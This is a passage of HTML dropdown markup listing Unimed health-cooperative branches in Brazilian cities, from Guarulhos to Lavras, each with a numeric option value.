<option value="284">UNIMED GUARULHOS</option>
<option value="172">UNIMED GUAXUPÉ</option>
<option value="317">UNIMED GURUPI</option>
<option value="326">UNIMED IBITINGA</option>
<option value="131">UNIMED IGUATÚ</option>
<option value="209">UNIMED ILHÉUS</option>
<option value="98">UNIMED IMPERATRIZ</option>
<option value="155">UNIMED INCONFIDENTES</option>
<option value="311">UNIMED IPAMERI</option>
<option value="193">UNIMED ITABIRA</option>
<option value="101">UNIMED ITABUNA</option>
<option value="535">UNIMED ITAITUBA</option>
<option value="137">UNIMED ITAJUBÁ</option>
<option value="132">UNIMED ITAPETININGA</option>
<option value="325">UNIMED ITAPEVA</option>
<option value="273">UNIMED ITAQUI</option>
<option value="540">UNIMED ITATIBA</option>
<option value="257">UNIMED ITAÚNA</option>
<option value="223">UNIMED ITUIUTABA</option>
<option value="272">UNIMED JABOTICABAL</option>
<option value="261">UNIMED JALES</option>
<option value="634">UNIMED JARAGUÁ DO SUL</option>
<option value="253">UNIMED JATAÍ</option>
<option value="113">UNIMED JEQUIÉ</option>
<option value="304">UNIMED JI-PARANÁ</option>
<option value="335">UNIMED JOAÇABA</option>
<option value="200">UNIMED JOÃO MONLEVADE</option>
<option value="33">UNIMED JOÃO PESSOA</option>
<option value="27">UNIMED JOINVILLE</option>
<option value="49">UNIMED JUIZ DE FORA</option>
<option value="127">UNIMED JUNDIAÍ</option>
<option value="220">UNIMED LAGES</option>
<option value="252">UNIMED LAVRAS</option>
<option value="233">UNIMED LENÇ..